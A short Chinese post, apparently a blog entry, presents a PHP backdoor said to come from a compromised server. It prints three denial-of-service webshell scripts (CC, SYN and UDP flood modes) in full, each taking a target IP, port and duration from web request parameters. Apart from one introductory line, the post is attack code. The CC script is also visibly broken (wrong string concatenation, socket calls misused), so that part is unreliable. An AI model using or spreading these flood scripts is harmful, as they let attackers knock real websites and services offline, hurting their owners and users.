phpshell_ddos攻击型webshell

从一个被中招的老兄的服务器中找到一个php后门，看了一下内容，原来webshell可以这样用

此乃cc模式：

<?php
error_reporting(E_ALL);
set_time_limit(0);
ob_implicit_flush();
$address = $_POST['site'];
$port = $_POST['port'];
$dongu = $_POST['dongu'];   //循环次数
$sayi = 1;
while ( $sayi <= $dongu ){
if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) === false) {
echo "HaHa\n";
}
 
if (socket_bind($sock, $address, $port) === false) {
echo "HaHa\n";
}
 
if (socket_listen($sock, 5) === false) {
echo "HaHa\n";
}
$msg = "HTTP/1.1 GET /\r\nHost:"+$_GET['site']+"\r\nConnection: Keep-Alive\r\n";
socket_write($msg);
socket_close($sock);                //这几句是核心功能
$sayi++;
echo "Goodbye...".$sayi;
}
?>

syn模式

<?php
ini_set("display_errors", "Off");
$packets = 0;
$ip = $_GET['ip'];
$port = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "状态 : 正常运行中.....<br>";
$max_time = $time+$exec_time;
while(1){
$packets++;
if(time() > $max_time){
break;
}
 
$fp = fsockopen("tcp://$ip", $port,$errno,$errstr,0);     //这几句是核心功能
 
}
?>

udp模式

<?php
$packets = 0;
$ip = $_GET['ip'];
$port = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "状态 : 正常运行中.....<br>";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= "phpddos";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
 
$fp = fsockopen("udp://$ip", $port, $errno, $errstr, 5);   //这几句是核心功能
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
?>